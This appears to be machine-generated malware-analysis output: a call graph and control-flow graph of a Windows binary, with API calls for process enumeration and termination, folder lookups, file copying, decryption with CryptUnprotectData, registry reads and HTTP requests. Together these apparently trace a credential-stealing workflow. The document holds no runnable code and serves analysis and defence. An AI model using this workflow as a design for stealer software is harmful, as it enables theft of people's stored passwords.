311b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 61265->61268 61266->61265 61268->61265 61269 311545d 61270 3115265 61269->61270 61271 31153a4 61269->61271 61274 3115292 61270->61274 61275 3115315 61270->61275 61272 3115456 61271->61272 61273 31182b4 NtFreeVirtualMemory 61271->61273 61273->61272 61276 31152ab HttpOpenRequestA 61274->61276 61277 311532e HttpOpenRequestA 61275->61277 61280 311539c 61276->61280 61277->61280 61280->61271 61281 31153b3 InternetSetOptionA 61280->61281 61282 31153d6 61280->61282 61281->61282 61283 3115424 HttpSendRequestA 61282->61283 61286 31153e0 61282->61286 61284 3115443 61283->61284 61284->61271 61285 311544c 61284->61285 61287 31182b4 NtFreeVirtualMemory 61285->61287 61288 31153fb HttpSendRequestA 61286->61288 61287->61272 61288->61284 61289 e62579c 61290 e6257a5 61289->61290 61291 e6257aa 61289->61291 61293 e624b50 61290->61293 61295 e624b9e 61293->61295 61294 e624c66 61515 e624c6d 61294->61515 61541 e624948 CreateToolhelp32Snapshot 61294->61541 61295->61294 61530 e6211d4 GetProcAddress 61295->61530 61299 e625037 61556 e626e54 61299->61556 61303 e624bfd 61303->61294 61531 e62189c GetProcAddress 61303->61531 61305 e625067 61307 e623cc0 24 API calls 61305->61307 61309 e625084 61307->61309 61308 e624c06 61308->61294 61532 e6216f4 61308->61532 61311 e623cc0 24 API calls 61309->61311 61313 e6250a5 61311->61313 61577 e62437c 61313->61577 61315 e6250b9 61317 e62437c 24 API calls 61315->61317 61319 e6250ca 61317->61319 61318 e624c13 61318->61294 61320 e624c62 61318->61320 61743 e62163c GetProcAddress 61318->61743 61584 e6271ac 61319->61584 61320->61294 61324 e6250f9 61325 e623c14 24 API calls 61324->61325 61326 e62510a 61325->61326 61327 e623c14 24 API calls 61326->61327 61328 e62511b 61327->61328 61329 e623c14 24 API calls 61328->61329 61330 e62512b 61329->61330 61331 e623c14 24 API calls 61330->61331 61332 e62513b 61331->61332 61623 e626ed8 61332->61623 61336 e62515a 61337 e624a90 2 API calls 61336->61337 61338 e625177 61337->61338 61640 e626f6c 61338->61640 61341 e626e2c GetProcessHeap 61342 e625184 61341->61342 61343 e626e54 2 API calls 61342->61343 61344 e625193 61343->61344 61645 e6275f8 61344->61645 61351 e626ed8 2 API calls 61352 e6251c8 61351->61352 61353 e624a90 2 API calls 61352->61353 61354 e6251df 61353->61354 61355 e624a90 2 API calls 61354->61355 61356 e6251f5 61355->61356 61357 e626f6c 4 API calls 61356->61357 61358 e6251fd 61357->61358 61359 e626e2c GetProcessHeap 61358->61359 61360 e625202 61359->61360 61361 e626e54 2 API calls 61360->61361 61362 e625211 61361->61362 61363 e6275f8 12 API calls 61362->61363 61364 e625220 61363->61364 61663 e62842c SHGetFolderPathA 61364->61663 61367 e62842c 54 API calls 61368 e625234 61367->61368 61369 e627680 2 API calls 61368->61369 61370 e62523c 61369->61370 61371 e626ed8 2 API calls 61370->61371 61372 e625244 61371->61372 61373 e624a90 2 API calls 61372->61373 61374 e62525b 61373->61374 61375 e624a90 2 API calls 61374->61375 61376 e625271 61375->61376 61377 e626f6c 4 API calls 61376->61377 61378 e625279 61377->61378 61379 e626e2c GetProcessHeap 61378->61379 61380 e62527e 61379->61380 61381 e626e54 2 API calls 61380->61381 61382 e62528d 61381->61382 61383 e6275f8 12 API calls 61382->61383 61384 e62529c 61383->61384 61678 e628848 RegOpenKeyExA 61384->61678 61388 e6252ac 61389 e627680 2 API calls 61388->61389 61390 e6252b4 61389->61390 61391 e626ed8 2 API calls 61390->61391 61392 e6252bc 61391->61392 61393 e624a90 2 API calls 61392->61393 61394 e6252d3 61393->61394 61395 e624a90 2 API calls 61394->61395 61396 e6252e9 61395->61396 61397 e626f6c 4 API calls 61396->61397 61398 e6252f1 61397->61398 61399 e626e2c GetProcessHeap 61398->61399 61400 e6252f6 61399->61400 61401 e626e54 2 API calls 61400->61401 61402 e625305 61401->61402 61403 e6275f8 12 API calls 61402->61403 61404 e625314 61403->61404 61405 e627c00 39 API calls 61404->61405 61406 e62532a 61405->61406 61407 e627680 2 API calls 61406->61407 61408 e625332 61407->61408 61409 e626ed8 2 API calls 61408->61409 61410 e62533a 61409->61410 61411 e624a90 2 API calls 61410->61411 61412 e625351 61411->61412 61413 e624a90 2 API calls 61412->61413 61414 e625367 61413->61414 61415 e626f6c 4 API calls 61414->61415 61416 e62536f 61415->61416 61417 e626e2c GetProcessHeap 61416->61417 61418 e625374 61417->61418 61419 e626e54 2 API calls 61418->61419 61420 e625383 61419->61420 61421 e6275f8 12 API calls 61420->61421 61422 e625392 61421->61422 61711 e62453c lstrcpyA lstrcatA RegOpenKeyExA 61422->61711 61424 e6253ac 61425 e6253b1 wsprintfA 61424->61425 61427 e6253da 61424->61427 61426 e62453c 20 API calls 61425->61426 61426->61424 61428 e6253f1 61427->61428 61430 e627680 2 API calls 61427->61430 61429 e627680 2 API calls 61428->61429 61431 e6253f9 61429->61431 61432 e6253e9 61430->61432 61433 e626ed8 2 API calls 61431->61433 61434 e627680 2 API calls 61432->61434 61435 e625401 61433->61435 61434->61428 61436 e624a90 2 API calls 61435->61436 61437 e625418 61436->61437 61438 e624a90 2 API calls 61437->61438 61439 e62542e 61438->61439 61440 e626f6c 4 API calls 61439->61440 61441 e625436 61440->61441 61442 e626e2c GetProcessHeap 61441->61442 61443 e62543b 61442->61443 61444 e626e54 2 API calls 61443->61444 61445 e62544a 61444->61445 61446 e6275f8 12 API calls 61445->61446 61447 e625459 61446->61447 61728 e625abc SHGetFolderPathA 61447->61728 61450 e627680 2 API calls 61451 e625477 61450->61451 61452 e626ed8 2 API calls 61451->61452 61453 e62547f 61452->61453 61454 e624a90 2 API calls 61453->61454 61455 e625496 61454->61455 61456 e624a90 2 API calls 61455->61456 61457 e6254ac 61456->61457 61458 e626f6c 4 API calls 61457->61458 61459 e6254b4 61458->61459 61460 e626e2c GetProcessHeap 61459->61460 61461 e6254b9 61460->61461 61462 e626e54 2 API calls 61461->61462 61463 e6254c8 61462->61463 61464 e6275f8 12 API calls 61463->61464 61465 e6254d7 SHGetFolderPathA 61464->61465 61466 e625537 61465->61466 61467 e6254fd lstrcatA 61465->61467 61469 e627680 2 API calls 61466->61469 61744 e626604 lstrcpyA lstrlenA 61467->61744 61470 e62553f 61469->61470 61471 e626ed8 2 API calls 61470->61471 61472 e625547 61471->61472 61473 e624a90 2 API calls 61472->61473 61474 e62555e 61473->61474 61475 e624a90 2 API calls 61474->61475 61476 e625574 61475->61476 61477 e626f6c 4 API calls 61476->61477 61478 e62557c 61477->61478 61479 e626e2c GetProcessHeap 61478->61479 61480 e625581 61479->61480 61481 e626e54 2 API calls 61480->61481 61482 e625590 61481->61482 61483 e6275f8 12 API calls 61482->61483 61484 e62559f 61483->61484 61734 e625d94 SHGetFolderPathA 61484->61734 61487 e627680 2 API calls 61488 e6255af 61487->61488 61489 e626ed8 2 API calls 61488->61489 61490 e6255b7 61489->61490 61491 e624a90 2 API calls 61490->61491 61492 e6255ce 61491->61492 61493 e624a90 2 API calls 61492->61493 61494 e6255e4 61493->61494 61495 e626f6c 4 API calls 61494->61495 61496 e6255ec 61495->61496 61497 e626e2c GetProcessHeap 61496->61497 61498 e6255f1 61497->61498 61499 e626e54 2 API calls 61498->61499 61500 e625600 61499->61500 61501 e6275f8 12 API calls 61500->61501 61502 e62560f 61501->61502 61503 e625abc 39 API calls 61502->61503 61504 e625625 61503->61504 61505 e627680 2 API calls 61504->61505 61506 e62562d 61505->61506 61507 e626ed8 2 API calls 61506->61507 61508 e625635 61507->61508 61509 e624a90 2 API calls 61508->61509 61510 e62564c 61509->61510 61511 e624a90 2 API calls 61510->61511 61512 e625662 61511->61512 61513 e626f6c 4 API calls 61512->61513 61514 e62566a 61513->61514 61514->61515 61516 e625690 GetProcessHeap 61514->61516 61517 e625688 61514->61517 61515->61291 61518 e6256a8 wcsftime 61516->61518 61519 e625756 GetProcessHeap HeapFree 61517->61519 61520 e62576a 61517->61520 61518->61517 61522 e6256b4 WideCharToMultiByte 61518->61522 61519->61520 61520->61515 61521 e62576f GetProcessHeap HeapFree 61520->61521 61521->61515 61741 e622300 61522->61741 61524 e6256e2 OpenFileMappingA 61525 e625733 61524->61525 61526 e625701 MapViewOfFile UnmapViewOfFile CloseHandle 61524->61526 61758 e624824 55 API calls wprintf 61525->61758 61526->61525 61528 e625742 61759 e624878 52 API calls wprintf 61528->61759 61530->61303 61531->61308 61535 e621754 memcpy_s 61532->61535 61533 e62117c GetSystemDirectoryW NtAllocateVirtualMemory 61533->61535 61534 e621872 61534->61294 61534->61318 61535->61533 61535->61534 61535->61535 61537 e6217e8 FindFirstFileW 61535->61537 61539 e621827 FindNextFileW 61535->61539 61540 e62183b LoadLibraryW 61535->61540 61760 e6224c0 61535->61760 61770 e62248c 61535->61770 61537->61535 61539->61535 61540->61535 61542 e624a6f 61541->61542 61543 e62497c Process32First 61541->61543 61554 e626e2c GetProcessHeap 61542->61554 61544 e624a66 CloseHandle 61543->61544 61545 e62499a GetCurrentProcessId 61543->61545 61544->61542 61546 e624a50 Process32Next 61545->61546 61546->61544 61547 e6249a7 61546->61547 61547->61546 61548 e6249c2 OpenProcess 61547->61548 61548->61546 61549 e6249d7 StrStrIA StrStrIA StrStrIA 61548->61549 61550 e624a33 61549->61550 61551 e624a3c TerminateProcess 61549->61551 61550->61551 61552 e624a38 61550->61552 61553 e624a47 CloseHandle 61551->61553 61552->61551 61552->61553 61553->61546 61555 e626e48 wcsftime 61554->61555 61555->61299 61557 e626e71 61556->61557 61562 e625046 61556->61562 61559 e626e95 61557->61559 61775 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61557->61775 61558 e626eb1 61778 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61558->61778 61559->61558 61777 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61559->61777 61566 e623cc0 61562->61566 61563 e626e8a 61776 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61563->61776 61567 e623cda 61566->61567 61568 e623d3b 61567->61568 61572 e623d14 61567->61572 61569 e623d41 61568->61569 61570 e623dbf 61568->61570 61576 e623d36 memcpy_s 61569->61576 61780 e6240ac 24 API calls new 61569->61780 61781 e6a5280 15 API calls 2 library calls 61570->61781 61779 e623dcc 15 API calls std::_Xinvalid_argument 61572->61779 61576->61305 61578 e6243b9 61577->61578 61579 e62439e 61577->61579 61783 e623ef4 61578->61783 61579->61578 61580 e6243ac 61579->61580 61782 e6243e0 24 API calls 2 library calls 61580->61782 61583 e6243b7 61583->61315 61585 e6271f2 61584->61585 61598 e6250ea 61584->61598 61590 e627214 61585->61590 61792 e626830 5 API calls wcsftime 61585->61792 61589 e627278 61594 e627293 61589->61594 61595 e62727f GetProcessHeap HeapFree 61589->61595 61593 e62725e 61590->61593 61590->61598 61793 e626830 5 API calls wcsftime 61590->61793 61591 e62723f 61592 e627243 61591->61592 61591->61593 61596 e627248 GetProcessHeap HeapFree 61592->61596 61592->61598 61794 e6270a0 GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61593->61794 61597 e627298 GetProcessHeap HeapFree 61594->61597 61594->61598 61595->61594 61596->61598 61597->61598 61599 e623c14 61598->61599 61600 e623c2d memcpy_s 61599->61600 61609 e623c71 61599->61609 61601 e623ca6 61600->61601 61602 e623c59 61600->61602 61600->61609 61795 e6b1fcc 22 API calls 2 library calls 61601->61795 61603 e623c62 61602->61603 61604 e623cab 61602->61604 61606 e623cb1 61603->61606 61607 e623c6b 61603->61607 61796 e6b1fcc 22 API calls 2 library calls 61604->61796 61797 e6b1fcc 22 API calls 2 library calls 61606->61797 61607->61609 61610 e623cb7 61607->61610 61609->61324 61798 e6b1fcc 22 API calls 2 library calls 61610->61798 61624 e625143 61623->61624 61626 e626eee 61623->61626 61635 e624a90 61624->61635 61625 e626f40 61802 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61625->61802 61626->61625 61799 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61626->61799 61629 e626f14 61800 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61629->61800 61630 e626f4d 61630->61624 61803 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61630->61803 61633 e626f21 61633->61625 61801 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61633->61801 61636 e624abd 61635->61636 61637 e624ae0 GetProcessHeap 61636->61637 61639 e624adb memcpy_s wcsftime 61636->61639 61638 e624af3 HeapReAlloc 61637->61638 61637->61639 61638->61639 61639->61336 61641 e626f71 61640->61641 61642 e62517f 61640->61642 61643 e626fa0 GetProcessHeap HeapFree 61641->61643 61644 e626f87 GetProcessHeap HeapFree 61641->61644 61642->61341 61643->61642 61644->61643 61646 e62761d 61645->61646 61650 e6251a2 61645->61650 61652 e62763f 61646->61652 61804 e626830 5 API calls wcsftime 61646->61804 61649 e627656 61649->61650 61651 e62765d GetProcessHeap HeapFree 61649->61651 61653 e627c00 SHGetFolderPathA 61650->61653 61651->61650 61652->61650 61805 e62750c GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61652->61805 61654 e627c4c lstrcatA lstrlenA 61653->61654 61655 e6251b8 61653->61655 61654->61655 61656 e627c73 61654->61656 61659 e627680 61655->61659 61656->61655 61657 e627c7d lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 61656->61657 61806 e627a88 61657->61806 61660 e627692 61659->61660 61662 e6251c0 61659->61662 61849 e6269d8 GetProcessHeap HeapReAlloc wcsftime 61660->61849 61662->61351 61664 e628470 lstrcatA 61663->61664 61665 e62522a 61663->61665 61666 e6284c0 61664->61666 61667 e628499 61664->61667 61665->61367 61850 e623698 61666->61850 61669 e626604 15 API calls 61667->61669 61671 e6284be 61669->61671 61671->61665 61673 e627680 2 API calls 61671->61673 61672 e626604 15 API calls 61676 e6284ee 61672->61676 61674 e628544 61673->61674 61675 e627680 2 API calls 61674->61675 61675->61665 61676->61671 61677 e628526 FreeLibrary 61676->61677 61677->61671 61679 e62888f CoInitialize CoCreateInstance 61678->61679 61680 e6252a4 61678->61680 61681 e6289c2 RegCloseKey 61679->61681 61682 e6288c2 61679->61682 61695 e6289e4 61680->61695 61681->61680 61682->61681 61683 e6288cf 61682->61683 61688 e628986 RegCloseKey 61683->61688 61690 e62892c StrStrIW 61683->61690 61949 e628568 21 API calls 61683->61949 61685 e6289bb 61685->61680 61686 e6289ab 61687 e627680 2 API calls 61686->61687 61689 e6289b3 61687->61689 61688->61685 61688->61686 61691 e627680 2 API calls 61689->61691 61690->61683 61691->61685 61693 e628952 CoTaskMemFree 61693->61683 61694 e628965 CoTaskMemFree 61693->61694 61694->61683 61696 e628a14 LoadLibraryA 61695->61696 61702 e628b1e 61695->61702 61697 e628a2d 6 API calls 61696->61697 61700 e628b08 61696->61700 61698 e628aca 61697->61698 61699 e628aff FreeLibrary 61697->61699 61698->61699 61701 e628af3 61698->61701 61699->61700 61700->61388 61701->61702 61702->61700 61703 e628d00 61702->61703 61709 e6270a0 GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61702->61709 61710 e627680 2 API calls 61702->61710 61950 e6248cc GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61702->61950 61951 e62750c GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61702->61951 61703->61700 61704 e627680 2 API calls 61703->61704 61705 e628d10 61704->61705 61706 e627680 2 API calls 61705->61706 61706->61700 61709->61702 61710->61702 61712 e6245a6 61711->61712 61713 e6245ad RegEnumKeyExA 61711->61713 61712->61424 61714 e6247f5 RegCloseKey 61713->61714 61720 e6245f6 61713->61720 61714->61712 61715 e624606 RegOpenKeyExA 61716 e6247ad RegEnumKeyExA 61715->61716 61715->61720 61716->61714 61716->61720 61717 e627680 2 API calls 61719 e6247a2 RegCloseKey 61717->61719 61718 e624648 lstrcpyW RegQueryValueExW 61718->61720 61719->61716 61720->61715 61720->61716 61720->61717 61720->61718 61720->61719 61725 e624714 CryptUnprotectData 61720->61725 61952 e6248cc GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61720->61952 61953 e62750c GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61720->61953 61954 e6270a0 GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61720->61954 61955 e627474 8 API calls 61720->61955 61956 e6270a0 GetProcessHeap HeapReAlloc lstrlenW GetProcessHeap HeapReAlloc 61720->61956 61725->61720 61727 e624779 LocalFree 61727->61720 61729 e625b08 lstrcatA lstrlenA 61728->61729 61730 e62546f 61728->61730 61729->61730 61731 e625b2f 61729->61731 61730->61450 61731->61730 61732 e625b39 lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 61731->61732 61957 e625944 61732->61957 61735 e625dc0 61734->61735 61736 e625ded SHGetFolderPathA 61734->61736 61737 e626604 15 API calls 61735->61737 61738 e6255a7 61736->61738 61739 e625e0d lstrcatA 61736->61739 61737->61736 61738->61487 61740 e626604 15 API calls 61739->61740 61740->61738 61742 e622318 61741->61742 61742->61524 61743->61318 61745 e626651 lstrcatA 61744->61745 61746 e626668 lstrcatA FindFirstFileA 61744->61746 61745->61746 61747 e626822 61746->61747 61756 e626696 61746->61756 61747->61466 61748 e62678a StrStrIA 61749 e62679c lstrcpyA 61748->61749 61751 e626804 FindNextFileA 61748->61751 61752 e6267b2 lstrcatA 61749->61752 61753 e6267c4 lstrcatA 61749->61753 61750 e6266c6 lstrcpyA 61754 e6266ee lstrcatA lstrcatA 61750->61754 61755 e6266dc lstrcatA 61750->61755 61751->61756 61757 e626819 FindClose 61751->61757 61752->61753 61753->61756 61754->61756 61755->61754 61756->61748 61756->61749 61756->61750 61756->61751 61756->61757 61757->61747 61758->61528 61759->61517 61761 e6224e0 61760->61761 61762 e6224f1 61760->61762 61763 e62248c NtFreeVirtualMemory 61761->61763 61764 e622513 61762->61764 61765 e6224fd VirtualQuery 61762->61765 61768 e6224e8 61763->61768 61766 e622522 61764->61766 61773 e62241c NtAllocateVirtualMemory 61764->61773 61765->61764 61766->61768 61769 e62248c NtFreeVirtualMemory 61766->61769 61768->61535 61769->61768 61771 e622491 NtFreeVirtualMemory 61770->61771 61772 e6224bc 61770->61772 61771->61772 61772->61535 61774 e62245a memcpy_s 61773->61774 61774->61766 61775->61563 61776->61559 61777->61559 61778->61562 61782->61583 61784 e623fe9 61783->61784 61791 e6a52a4 15 API calls 2 library calls 61784->61791 61792->61590 61793->61591 61794->61589 61799->61629 61800->61633 61801->61633 61802->61630 61803->61624 61804->61652 61805->61649 61807 e627708 6 API calls 61806->61807 61808 e627ab5 CopyFileA 61807->61808 61809 e627aca GetLastError 61808->61809 61812 e627ae2 61808->61812 61810 e627ad5 GetLastError 61809->61810 61811 e627adb 61809->61811 61810->61811 61811->61656 61812->61811 61823 e625e5c 61812->61823 61815 e627b31 GetProcessHeap 61821 e627b49 wcsftime 61815->61821 61816 e677ee8 CloseHandle 61817 e627b99 61816->61817 61818 e627ba2 GetProcessHeap HeapFree 61817->61818 61819 e627bb6 GetProcessHeap HeapFree 61817->61819 61818->61819 61837 e6a0c7c 61819->61837 61821->61816 61821->61821 61822 e627bd8 DeleteFileA 61822->61811 61839 e626500 CreateFileA 61823->61839 61826 e625e85 61826->61811 61826->61815 61826->61821 61827 e625e92 StrStrIA 61828 e625fb5 GetProcessHeap HeapFree 61827->61828 61829 e625eaf StrChrA 61827->61829 61828->61826 61829->61828 61830 e625eca 61829->61830 61830->61828 61831 e625f01 CryptUnprotectData 61830->61831 61831->61828 61832 e625f38 GetProcessHeap 61831->61832 61834 e625f50 wcsftime 61832->61834 61833 e625fa1 LocalFree 61833->61828 61834->61828 61834->61833 61835 e625f6a GetProcessHeap 61834->61835 61836 e625f82 wcsftime 61835->61836 61836->61833 61836->61836 61838 e6a0c94 61837->61838 61838->61822 61840 e626551 GetFileSize 61839->61840 61841 e625e81 61839->61841 61842 e626565 61840->61842 61843 e62656b GetProcessHeap 61840->61843 61841->61826 61841->61827 61844 e6265e3 CloseHandle 61842->61844 61845 e626583 wcsftime 61843->61845 61844->61841 61845->61842 61846 e62659e ReadFile 61845->61846 61847 e62659a 61845->61847 61846->61847 61847->61844 61848 e6265cf GetProcessHeap HeapFree 61847->61848 61848->61844 61849->61662 61883 e62343c 61850->61883 61852 e6237ae 61914 e6241d0 61852->61914 61854 e6236bc 61854->61852 61857 e623cc0 24 API calls 61854->61857 61859 e6236fb 61857->61859 61858 e623c14 24 API calls 61861 e6237ea 61858->61861 61860 e6241d0 24 API calls 61859->61860 61862 e623710 61860->61862 61863 e6238f0 61861->61863 61864 e6237fa 7 API calls 61861->61864 61927 e624340 15 API calls 61862->61927 61866 e623c14 24 API calls 61863->61866 61864->61863 61867 e6238b9 61864->61867 61869 e6238fe 61866->61869 61867->61863 61868 e623721 61870 e623c14 24 API calls 61868->61870 61869->61671 61869->61672 61871 e623730 61870->61871 61872 e623cc0 24 API calls 61871->61872 61873 e62374f 61872->61873 61928 e624340 15 API calls 61873->61928 61875 e623761 61876 e623c14 24 API calls 61875->61876 61877 e623781 61876->61877 61878 e623c14 24 API calls 61877->61878 61879 e623790 61878->61879 61880 e623c14 24 API calls 61879->61880 61881 e62379f 61880->61881 61882 e623c14 24 API calls 61881->61882 61882->61852 61884 e623cc0 24 API calls 61883->61884 61885 e62348f SHGetValueA 61884->61885 61886 e6234d5 61885->61886 61889 e623653 61885->61889 61887 e623cc0 24 API calls 61886->61887 61888 e6234f2 61887->61888 61890 e6241d0 24 API calls 61888->61890 61891 e623c14 24 API calls 61889->61891 61892 e623508 61890->61892 61893 e62367c 61891->61893 61894 e62437c 24 API calls 61892->61894 61893->61854 61895 e62351a 61894->61895 61929 e62430c 24 API calls 61895->61929 61897 e623527 61898 e623c14 24 API calls 61897->61898 61906 e623561 61897->61906 61904 e623543 memcpy_s 61898->61904 61899 e623c14 24 API calls 61900 e6235a3 61899->61900 61901 e623c14 24 API calls 61900->61901 61902 e6235b2 61901->61902 61903 e623c14 24 API calls 61902->61903 61905 e6235c1 61903->61905 61904->61906 61907 e623c14 24 API calls 61905->61907 61906->61899 61906->61904 61908 e6235d1 61907->61908 61909 e623cc0 24 API calls 61908->61909 61910 e6235e1 SHGetValueA 61909->61910 61910->61889 61911 e62362c 61910->61911 61912 e623cc0 24 API calls 61911->61912 61913 e623651 61912->61913 61913->61889 61917 e624215 61914->61917 61915 e623ef4 15 API calls 61916 e6242e9 61915->61916 61930 e623a44 61916->61930 61924 e62426d 61917->61924 61925 e624282 61917->61925 61944 e6a5280 15 API calls 2 library calls 61917->61944 61920 e624274 61945 e6240ac 24 API calls new 61920->61945 61922 e624284 61922->61925 61926 e623c14 24 API calls 61922->61926 61923 e6237c2 LoadLibraryA 61923->61858 61924->61920 61924->61922 61925->61915 61926->61925 61927->61868 61928->61875 61929->61897 61932 e623a63 61930->61932 61931 e623ac7 61933 e623b70 61931->61933 61934 e623ada 61931->61934 61932->61931 61936 e623a9d 61932->61936 61947 e6a5280 15 API calls 2 library calls 61933->61947 61937 e623b7c 61934->61937 61938 e623aed 61934->61938 61943 e623abf memcpy_s 61934->61943 61942 e623ef4 15 API calls 61936->61942 61948 e6a5280 15 API calls 2 library calls 61937->61948 61938->61943 61946 e6240ac 24 API calls new 61938->61946 61942->61943 61943->61923 61949->61693 61951->61702 61953->61720 61954->61720 61955->61720 61956->61727 61958 e627708 6 API calls 61957->61958 61959 e625971 CopyFileA 61958->61959 61960 e625986 GetLastError 61959->61960 61963 e62599e 61959->61963 61961 e625991 GetLastError 61960->61961 61962 e625997 61960->61962 61961->61962 61962->61731 61963->61962 61964 e625e5c 15 API calls 61963->61964 61965 e6259c2 61964->61965 61965->61962 61966 e6259ed GetProcessHeap 61965->61966 61968 e625a05 wcsftime 61965->61968 61966->61968 61967 e677ee8 CloseHandle 61969 e625a55 61967->61969 61968->61967 61970 e625a72 GetProcessHeap HeapFree 61969->61970 61971 e625a5e GetProcessHeap HeapFree 61969->61971 61972 e6a0c7c 61970->61972 61971->61970 61973 e625a94 DeleteFileA 61972->61973 61973->61962

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 e624b50-e624b9a 1 e624b9e-e624baf call e6210a0 0->1 4 e624c66 1->4 5 e624bb5-e624bbd 1->5 7 e624c69-e624c6b 4->7 5->1 6 e624bbf-e624bd6 5->6 8 e624bdb-e624bec call e6210a0 6->8 9 e624c75-e6250cf call e624948 call e626e2c call e626e54 call e623cc0 * 3 call e62437c * 2 7->9 10 e624c6d-e624c70 7->10 8->4 16 e624bee-e624bf6 8->16 45 e6250d1 9->45 46 e6250d4-e6253ac call e6271ac call e623c14 * 5 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e627c00 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e62842c * 2 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e628848 call e6289e4 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e627c00 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e62453c 9->46 12 e625785-e62579b 10->12 16->8 19 e624bf8-e624bff call e6211d4 16->19 19->4 25 e624c01-e624c08 call e62189c 19->25 25->4 30 e624c0a call e6216f4 25->30 34 e624c0f-e624c11 30->34 34->4 36 e624c13-e624c36 34->36 38 e624c3b-e624c56 call e62163c 36->38 38->4 44 e624c58-e624c60 38->44 44->38 47 e624c62-e624c64 44->47 45->46 152 e6253b1-e6253d8 wsprintfA call e62453c 46->152 47->7 155 e6253da-e6253df 152->155 156 e6253f1-e6254fb call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e625abc call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 SHGetFolderPathA 155->156 157 e6253e1-e6253ec call e627680 * 2 155->157 195 e625537-e625672 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e625d94 call e627680 call e626ed8 call e624a90 * 2 call e626f6c call e626e2c call e626e54 call e6275f8 call e625abc call e627680 call e626ed8 call e624a90 * 2 call e626f6c 156->195 196 e6254fd-e625532 lstrcatA call e626604 156->196 157->156 244 e625783 195->244 245 e625678-e625686 195->245 196->195 244->12 246 e625690-e6256ae GetProcessHeap call e6c5168 245->246 247 e625688-e62568b 245->247 248 e625751-e625754 246->248 254 e6256b4-e6256ff WideCharToMultiByte call e622300 OpenFileMappingA 246->254 247->248 250 e625756-e625764 GetProcessHeap HeapFree 248->250 251 e62576a-e62576d 248->251 250->251 251->244 253 e62576f-e62577d GetProcessHeap HeapFree 251->253 253->244 257 e625733-e62574c call e624824 call e624878 254->257 258 e625701-e62572d MapViewOfFile UnmapViewOfFile CloseHandle 254->258 257->248 258->257
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E624948: CreateToolhelp32Snapshot.KERNEL32 ref: 0E624969
                                                                                                                                                                                  • Part of subcall function 0E624948: Process32First.KERNEL32 ref: 0E62498C
                                                                                                                                                                                  • Part of subcall function 0E624948: GetCurrentProcessId.KERNEL32 ref: 0E62499A
                                                                                                                                                                                  • Part of subcall function 0E624948: Process32Next.KERNEL32 ref: 0E624A58
                                                                                                                                                                                  • Part of subcall function 0E624948: CloseHandle.KERNEL32 ref: 0E624A69
                                                                                                                                                                                  • Part of subcall function 0E626E2C: GetProcessHeap.KERNEL32 ref: 0E626E30
                                                                                                                                                                                  • Part of subcall function 0E626E2C: HeapAlloc.KERNEL32 ref: 0E626E42
                                                                                                                                                                                  • Part of subcall function 0E628848: RegOpenKeyExA.ADVAPI32 ref: 0E62887F
                                                                                                                                                                                  • Part of subcall function 0E628848: CoInitialize.OLE32 ref: 0E628891
                                                                                                                                                                                  • Part of subcall function 0E628848: CoCreateInstance.OLE32 ref: 0E6288B4
                                                                                                                                                                                  • Part of subcall function 0E628848: StrStrIW.SHLWAPI ref: 0E628933
                                                                                                                                                                                  • Part of subcall function 0E628848: CoTaskMemFree.OLE32 ref: 0E628956
                                                                                                                                                                                  • Part of subcall function 0E628848: CoTaskMemFree.OLE32 ref: 0E628965
                                                                                                                                                                                  • Part of subcall function 0E628848: RegCloseKey.ADVAPI32 ref: 0E6289A1
                                                                                                                                                                                  • Part of subcall function 0E6289E4: LoadLibraryA.KERNEL32 ref: 0E628A1B
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A37
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A4E
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A65
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A7C
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A93
                                                                                                                                                                                  • Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628AB1
                                                                                                                                                                                  • Part of subcall function 0E624A90: GetProcessHeap.KERNEL32 ref: 0E624AE0
                                                                                                                                                                                  • Part of subcall function 0E624A90: HeapReAlloc.KERNEL32 ref: 0E624AFA
                                                                                                                                                                                  • Part of subcall function 0E626F6C: GetProcessHeap.KERNEL32 ref: 0E626F87
                                                                                                                                                                                  • Part of subcall function 0E626F6C: HeapFree.KERNEL32 ref: 0E626F95
